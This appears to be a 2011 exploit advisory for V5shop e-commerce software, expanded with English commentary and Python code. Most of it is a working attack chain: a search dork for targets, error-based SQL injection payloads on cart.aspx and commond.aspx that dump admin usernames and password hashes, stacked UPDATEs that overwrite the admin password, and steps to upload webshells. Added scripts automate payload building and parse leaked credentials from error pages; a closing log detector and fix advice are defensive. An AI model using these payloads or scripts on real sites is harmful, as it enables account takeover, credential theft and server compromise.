V5shop injection vulnerability - vulnerability warning - the black bar safety net

2011-08-22T00:00:00
ID MYHACK58:62201131649
Type myhack58
Reporter Anonymous (佚名)
Modified 2011-08-22T00:00:00

Description

Severity: high. First vulnerable file: cart.aspx

Search keyword (Google dork): inurl:scoreindex.aspx

exp:

/cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --

This is error-based extraction against SQL Server. The id parameter is concatenated into the query unescaped; the subquery joins the administrator's Name and Pass with char(124) ("|", the %2B is a URL-encoded "+"), and comparing that string with 0 makes the database raise a conversion error whose message echoes the string back in the error page. The inner Select Top 4 in ascending order followed by the outer Order by ... desc picks the fourth row of Web_Admin; change the 4 to walk through the other rows.

The result is shown in the figure (the part circled in red is the username and the MD5 password hash).

Then submit the dumped MD5 hash to an online cracking service; if it cracks, log in to the back end at the default address /weblogin with the username and password obtained. Often the MD5 cannot be cracked, in which case the administrator password is overwritten instead:

update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100

The value after pass= is built by taking the plaintext password, computing its 32-character MD5, converting it to uppercase, and encoding the result as a SQL Server hex literal (each character as a UTF-16LE code unit, i.e. an nvarchar value; decoding the literal above gives C04602E1568709587D6E5C76FD04CE71). The literal above corresponds to the default password v5shop.

The full injected request is:

cart.aspx?act=buy&id=1 and (update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100 )>0 --

Note that wrapping an UPDATE in a comparison is not valid T-SQL (a parenthesised subquery must be a SELECT), so this exact form raises a syntax error rather than changing anything; the stacked form used for commond.aspx below, and repeated at the end of this page, appends the UPDATE as a second statement and is what actually executes.
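The following is an added example, not code from the advisory or from V5shop. It reproduces the three encoding steps the advisory describes for the pass= value (MD5, uppercase, nvarchar hex literal), decodes the literal printed above to check that description, and builds the same UPDATE for any chosen password. The table name web_admin is taken from the page; whether the page's literal really is MD5("v5shop") is the advisory's claim, which the block tests at run time rather than assuming.

```python
import hashlib

# Added example (not code from the advisory): reproduces the encoding the
# advisory describes for the pass= value and checks it against the literal
# on this page.

# Literal copied from the advisory's UPDATE statement.
ADVISORY_LITERAL = (
    "0x"
    "43003000340036003000320045003100"
    "35003600380037003000390035003800"
    "37004400360045003500430037003600"
    "46004400300034004300450037003100"
)


def text_to_sql_hex(text: str) -> str:
    """Encode a string as the 0x... literal SQL Server accepts for an nvarchar
    value: one UTF-16LE code unit (two bytes, low byte first) per character."""
    return "0x" + text.encode("utf-16-le").hex().upper()


def sql_hex_to_text(literal: str) -> str:
    """Inverse of text_to_sql_hex; accepts the literal with or without 0x."""
    body = literal[2:] if literal[:2].lower() == "0x" else literal
    return bytes.fromhex(body).decode("utf-16-le")


def password_to_sql_hex(password: str) -> str:
    """Plaintext -> 32-character MD5 -> uppercase -> nvarchar hex literal,
    the three steps the advisory lists."""
    digest = hashlib.md5(password.encode("utf-8")).hexdigest().upper()
    return text_to_sql_hex(digest)


def reset_statement(password: str, table: str = "web_admin") -> str:
    """The UPDATE the advisory stacks onto the vulnerable query (table name
    from the advisory)."""
    return f"update {table} set pass={password_to_sql_hex(password)}"


def advisory_literal_matches(password: str) -> bool:
    """True if the page's literal is the encoded MD5 of `password`. The
    advisory claims this for 'v5shop'; the claim is checked, not assumed."""
    return password_to_sql_hex(password) == ADVISORY_LITERAL


if __name__ == "__main__":
    print("decoded literal:", sql_hex_to_text(ADVISORY_LITERAL))
    print("matches MD5('v5shop'):", advisory_literal_matches("v5shop"))
    print(reset_statement("v5shop"))
```

The decode step is worth running before using any such literal from a write-up: a single dropped hex digit shifts every following code unit and the UPDATE would silently store garbage rather than a recognisable hash.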

If that succeeds, log in to the back end at the default address /weblogin with the username found above and the password v5shop.

Once in the back end, go to System settings -> Parameter settings -> Background upload watermark. The watermark upload there appears to accept arbitrary files: upload an ASP webshell first, then use it to upload an ASPX webshell.

Summary: this method works on version 8.2 and all earlier versions; the latest version, 8.3, has fixed the vulnerability.

Fix: upgrade to the latest version, 8.3, or as a temporary measure rename cart.aspx or otherwise take it out of reach. The root cause is that the id parameter is concatenated into the SQL statement unescaped, so any permanent fix has to pass it to the database as a typed parameter.

Second vulnerable file: commond.aspx

exp:

/commond.aspx?id=1 and 1=(select top 1 [name] from web_admin)
This displays the admin username directly: comparing the integer 1 with the string column forces the same conversion error as above, and the error message carries the value.

/commond.aspx?id=1 and 1=(select top 1 [pass] from web_admin)
This likewise displays the MD5 password hash.
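The following is an added example, not code from the advisory, and it serves both the cart.aspx payload earlier on this page and the two commond.aspx payloads just above. It generalises the advisory's row-selection trick to any row number and any column list, URL-encodes the result for the vulnerable id parameter, and parses the SQL Server conversion error out of an ASP.NET error page (the step the advisory only shows as a screenshot). The table and column names come from the page; the error-page HTML is constructed here for illustration, the hash in it is a placeholder, and the two error-message wordings are SQL Server's own (2005 and later, and 2000).

```python
import html
import re
from urllib.parse import quote

# Added example (not code from the advisory). Table and column names are the
# ones the advisory uses; everything else is this example's own.
TABLE = "Web_Admin"
COLUMNS = ("Name", "Pass")
SEP = "|"  # char(124) in the advisory's payload


def nth_row_payload(n: int, table: str = TABLE, cols=COLUMNS) -> str:
    """Value for the vulnerable id parameter that leaks row n (1-based).

    Same trick as the cart.aspx payload: the inner query takes TOP n rows in
    ascending order, the outer query reverses the order, so TOP 1 is row n.
    Comparing the varchar result with 0 forces the conversion error.
    """
    select_list = "+char(124)+".join(
        f"isNull(cast([{c}] as varchar(8000)),char(32))" for c in cols
    )
    col_list = ",".join(f"[{c}]" for c in cols)
    desc_list = ",".join(f"[{c}] desc" for c in cols)
    subquery = (
        f"Select Top 1 char(124)+{select_list}+char(124) "
        f"From (Select Top {n} {col_list} From [{table}] Where 1=1 "
        f"Order by {col_list}) T Order by {desc_list}"
    )
    return f"1 and ({subquery})>0 --"


def single_column_payload(col: str, table: str = TABLE) -> str:
    """The simpler commond.aspx form: compare the integer 1 with a string column."""
    return f"1 and 1=(select top 1 [{col}] from {table})"


def inject_url(page: str, payload: str, extra: str = "") -> str:
    """Request path for the payload; quote() turns '+' into %2B and ' ' into %20,
    which is why the advisory's payload shows %2B between the pieces."""
    return f"/{page}?{extra}id={quote(payload)}"


# SQL Server's own wording for the error that carries the converted value.
_LEAK_PATTERNS = (
    re.compile(r"Conversion failed when converting the n?varchar value "
               r"'(?P<v>.*?)' to data type int"),          # 2005 and later
    re.compile(r"Syntax error converting the n?varchar value "
               r"'(?P<v>.*?)' to a column of data type int"),  # 2000
)


def extract_leaked_value(body: str):
    """Return the quoted value from a conversion error, or None. The body is
    HTML-unescaped first because ASP.NET error pages encode the quote marks."""
    text = html.unescape(body)
    for pat in _LEAK_PATTERNS:
        m = pat.search(text)
        if m:
            return m.group("v")
    return None


def parse_admin_row(body: str, cols=COLUMNS, sep=SEP):
    """Split a |Name|Pass| style leak into a dict; None if the page does not
    contain one or the field count does not match."""
    value = extract_leaked_value(body)
    if value is None or len(value) < 2:
        return None
    if not (value.startswith(sep) and value.endswith(sep)):
        return None
    fields = value[1:-1].split(sep)
    return dict(zip(cols, fields)) if len(fields) == len(cols) else None


# Constructed ASP.NET error pages (not captured from a real V5shop install);
# the hash is a placeholder, not a real password hash.
SAMPLE_ERROR_PAGE = (
    "<html><body><h1>Server Error in '/' Application.</h1>"
    "<h2><i>Conversion failed when converting the varchar value "
    "&#39;|admin|0123456789ABCDEF0123456789ABCDEF|&#39; to data type int."
    "</i></h2></body></html>"
)
SAMPLE_SINGLE_VALUE_PAGE = (
    "<h2><i>Conversion failed when converting the nvarchar value "
    "&#39;admin&#39; to data type int.</i></h2>"
)

if __name__ == "__main__":
    print(inject_url("cart.aspx", nth_row_payload(4), "act=buy&"))
    print(inject_url("commond.aspx", single_column_payload("name")))
    print(parse_admin_row(SAMPLE_ERROR_PAGE))
    print(extract_leaked_value(SAMPLE_SINGLE_VALUE_PAGE))
```

If the site has customErrors switched on, the 500 still occurs but the body no longer contains the message, and both parsers return None; that is exactly the difference between this advisory's visible-error technique and a blind attack.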

/commond.aspx?id=1 update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100

This changes the administrator password. Here the UPDATE is simply appended as a second (stacked) statement, which T-SQL accepts without a separating semicolon.

If that succeeds, the administrator password has been set to the password you chose (v5shop for the literal above); log in to the back end at the default address /weblogin with the username obtained above and that password.

Getting a shell (not verified): System settings -> Parameter settings -> Background upload watermark. Upload an ASP webshell first, then an ASPX one through it. Uploaded files land under /uploadFile/Picture/*.asp

Summary: this method works on version 8.2 and all earlier versions; the latest version, 8.3, has fixed the vulnerability.

Fix: upgrade to the latest version, 8.3, or as a temporary measure rename commond.aspx or otherwise take it out of reach.
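Until the upgrade is done, the requests on this page are easy to spot in the web server logs, so the following is an added example (not from the advisory or from V5shop) of detection logic for a defender: it parses IIS W3C log lines, looks only at the two vulnerable pages named on this page, and flags any id value that is not a plain number and contains SQL keywords or a long hex literal, marking a 500 response on such a request as a probable error-based leak. The log excerpt is constructed for the example (addresses, timestamps and the truncated hex literal are invented), and the field list is the default IIS W3C one.

```python
import re
from urllib.parse import parse_qs

# Added example (not code from the advisory). Constructed IIS W3C log excerpt:
# one benign purchase, one cart.aspx extraction attempt that produced a 500,
# one commond.aspx password reset. Addresses and timestamps are invented and
# the hex literal is deliberately truncated.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2011-08-22 09:15:01 10.0.0.5 GET /cart.aspx act=buy&id=12 80 - 10.0.0.20 Mozilla/5.0 200 0 0
2011-08-22 09:16:40 10.0.0.5 GET /cart.aspx act=buy&id=1%20and%20(Select%20Top%201%20char(124)%2BisNull(cast([Name]%20as%20varchar(8000)),char(32))%20From%20[Web_Admin])>0%20-- 80 - 10.0.0.99 Mozilla/5.0 500 0 0
2011-08-22 09:17:05 10.0.0.5 GET /commond.aspx id=1%20update%20web_admin%20set%20pass=0x43003000340036003000 80 - 10.0.0.99 Mozilla/5.0 200 0 0
"""

# The two files this advisory names; extend as needed.
VULN_PAGES = {"/cart.aspx", "/commond.aspx"}

# Keywords used by the payloads on this page, a long hex literal, or a
# trailing comment marker. Case-insensitive.
SQLI_RE = re.compile(
    r"(?i)\b(select|update|insert|delete|union|cast|char|from)\b|0x[0-9a-f]{8,}|--"
)


def parse_w3c(text: str):
    """Turn an IIS W3C log into dicts keyed by the names in the #Fields line."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows


def suspicious_id(query: str):
    """Return the decoded id value if it is not a bare integer and looks like
    SQL, else None. parse_qs percent-decodes the value once."""
    if query == "-":  # IIS writes '-' for an empty query string
        return None
    for value in parse_qs(query, keep_blank_values=True).get("id", []):
        if not value.strip().isdigit() and SQLI_RE.search(value):
            return value
    return None


def detect(text: str):
    """List every request to a vulnerable page whose id parameter looks like an
    injection; likely_error_leak is set when the server answered 500, which is
    what the visible conversion error on this page produces."""
    hits = []
    for row in parse_w3c(text):
        if row.get("cs-uri-stem", "").lower() not in VULN_PAGES:
            continue
        bad = suspicious_id(row.get("cs-uri-query", "-"))
        if bad is None:
            continue
        hits.append({
            "time": f"{row['date']} {row['time']}",
            "client": row.get("c-ip"),
            "page": row["cs-uri-stem"],
            "status": row.get("sc-status"),
            "id": bad,
            "likely_error_leak": row.get("sc-status") == "500",
        })
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit)
```

A bare-integer check on id is the cheap first filter here because the real application only ever sends numbers; anything else on these two pages is worth a look even if the keyword regex misses it.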

Tip: if you use this system, upgrade promptly. This post is for learning only; do not use it for illegal purposes.

Stacked-query form of the cart.aspx password reset (the same shape as the commond.aspx payload above):

cart.aspx?act=buy&id=1 update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100--